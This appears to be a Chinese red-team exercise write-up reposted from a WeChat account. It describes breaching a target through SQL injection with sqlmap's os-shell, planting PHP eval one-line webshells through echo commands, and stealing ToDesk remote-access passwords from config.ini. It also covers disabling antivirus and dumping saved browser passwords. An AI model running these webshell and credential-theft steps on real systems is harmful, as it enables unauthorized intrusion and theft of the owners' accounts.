首先拿到目标单位名在企查查等上面没查到有网址:
然后从fofa上根据title搜到几个可以打开的系统,搜一下旁站信息,是bt建的站
开局一个登录框,抓包查看信息,像这种明文账号、密码的一般是先查看是否有waf没的话,直接sqlmap暴力注入测试,有注入的几率很大。
结果不出所料果真有注入,--os-shell直接administrator
接下开使用certutil、cscript、certutil等下载木马直接上线cs,但是这几个命令都试了——失败,这种可能是有杀软。
最后就是让目标报错——报出绝对路径——写木马
Windows echo一句话木马:
echo ^<? php @eval($_POST['123']); ?^> > shell.php
Linux:
echo '<?php @eval($_POST["123"]); ?>' > 1.php
成功写入并链接:
使用蚁剑连接(由于宝塔命令执行限制,蚁剑插件可绕过)
完美执行命令
Windows的宝塔一般都是system权限。
信息收集,发现目标装有火绒但是有todesk
有todesk就好办很多,
可以读取todesk配置信息,默认目录文件:C:Program FilesToDeskconfig.ini
将目标的config.ini中的tempAuthPassEx值,替换掉自己的,然后打开自己的todesk即可看到连接密码。
最后连上todesk
内网信息收集
不知道为啥bt default读取的宝塔账号密码不正确;
关闭杀毒软件——上传WebBrowserPassView读取浏览器存储的密码,读到了bt密码;
本地登录bt:
原文始发于微信公众号(fly的渗透学习笔记):记一次攻防演练找到简单突破口
- 左青龙
- 微信扫一扫
-
- 右白虎
- 微信扫一扫
-
评论